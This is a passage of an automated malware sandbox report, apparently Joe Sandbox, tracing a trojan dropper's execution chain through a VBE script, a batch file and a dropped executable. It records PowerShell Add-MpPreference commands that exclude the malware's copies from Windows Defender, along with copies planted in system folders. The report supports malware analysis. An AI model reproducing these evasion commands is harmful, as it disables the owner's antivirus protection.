                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWindow created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeProcess Stats: CPU usage > 49%
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_00906FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00906FAA
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Windows\ShellExperiences\uAsLgsGzSk.exeJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Windows\ShellExperiences\de5836ef699499Jump to behavior
                                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0090848E0_2_0090848E
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_009140880_2_00914088
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_009100B70_2_009100B7
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_009040FE0_2_009040FE
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_009251C90_2_009251C9
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_009171530_2_00917153
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_009162CA0_2_009162CA
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_009032F70_2_009032F7
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_009143BF0_2_009143BF
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0090C4260_2_0090C426
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0092D4400_2_0092D440
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0090F4610_2_0090F461
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_009177EF0_2_009177EF
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0092D8EE0_2_0092D8EE
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0090286B0_2_0090286B
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0090E9B70_2_0090E9B7
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_009319F40_2_009319F4
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_00916CDC0_2_00916CDC
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_00913E0B0_2_00913E0B
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_00924F9A0_2_00924F9A
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0090EFE20_2_0090EFE2
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 5_2_00007FFD9B9E0D705_2_00007FFD9B9E0D70
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 5_2_00007FFD9BBA6C355_2_00007FFD9BBA6C35
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 5_2_00007FFD9BBA69FB5_2_00007FFD9BBA69FB
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 5_2_00007FFD9BBA69775_2_00007FFD9BBA6977
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 5_2_00007FFD9BB9079A5_2_00007FFD9BB9079A
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 5_2_00007FFD9BBA4F8F5_2_00007FFD9BBA4F8F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9BAD30E921_2_00007FFD9BAD30E9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9BAD2E1C22_2_00007FFD9BAD2E1C
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD9BAF30E926_2_00007FFD9BAF30E9
                                    Source: C:\Recovery\uAsLgsGzSk.exeCode function: 35_2_00007FFD9BA10D7035_2_00007FFD9BA10D70
                                    Source: C:\Recovery\uAsLgsGzSk.exeCode function: 35_2_00007FFD9BA59A4035_2_00007FFD9BA59A40
                                    Source: C:\Recovery\uAsLgsGzSk.exeCode function: 35_2_00007FFD9BA2BA1D35_2_00007FFD9BA2BA1D
                                    Source: C:\Recovery\uAsLgsGzSk.exeCode function: 37_2_00007FFD9B9F0D7037_2_00007FFD9B9F0D70
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CvvLBlqK.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: String function: 0091EB78 appears 39 times
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: String function: 0091EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: String function: 0091F5F0 appears 31 times
                                    Source: NVLRgsWM.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: vJjMMWBx.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: maPwcuvP.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: HupKRiKa.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: cIDyHnkk.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: JwbtnRPV.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: zIxCDFUn.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: zHJVyCcw.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: hnxxzxgb.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: CvvLBlqK.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: FyhuXVvF.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: vPOensqX.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: mlFoDzaq.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: eIxzTFKJ.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: LqKTzAAu.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: qTMMgMAe.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: QdcRcxPi.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: GvICsVKA.log.42.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: hz7DzW2Yop.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@37/346@0/2
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_00906C74 GetLastError,FormatMessageW,0_2_00906C74
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0091A6C2
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exeJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\zHJVyCcw.logJump to behavior
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeMutant created: NULL
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\bd9da7f16f55026e79d340b5ea02a5a7f7e28b00743a65fca34947ef8d4bc1c2
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\AppData\Local\Temp\l7eRP4ZeWhJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCommand line argument: sfxname0_2_0091DF1E
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCommand line argument: sfxstime0_2_0091DF1E
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCommand line argument: STARTDLG0_2_0091DF1E
                                    Source: hz7DzW2Yop.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: hz7DzW2Yop.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: hz7DzW2Yop.exeReversingLabs: Detection: 68%
                                    Source: hz7DzW2Yop.exeVirustotal: Detection: 59%
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeFile read: C:\Users\user\Desktop\hz7DzW2Yop.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\hz7DzW2Yop.exe "C:\Users\user\Desktop\hz7DzW2Yop.exe"
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\HyperWebbroker\serverBrokerperfMonitor.exe "C:\HyperWebbroker/serverBrokerperfMonitor.exe"
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe'
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Recovery\uAsLgsGzSk.exe C:\Recovery\uAsLgsGzSk.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: unknownProcess created: C:\Recovery\uAsLgsGzSk.exe C:\Recovery\uAsLgsGzSk.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\ShellExperiences\uAsLgsGzSk.exe "C:\Windows\ShellExperiences\uAsLgsGzSk.exe"
                                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\HyperWebbroker\serverBrokerperfMonitor.exe "C:\HyperWebbroker/serverBrokerperfMonitor.exe"Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\ShellExperiences\uAsLgsGzSk.exe "C:\Windows\ShellExperiences\uAsLgsGzSk.exe"
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: iconcodecservice.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
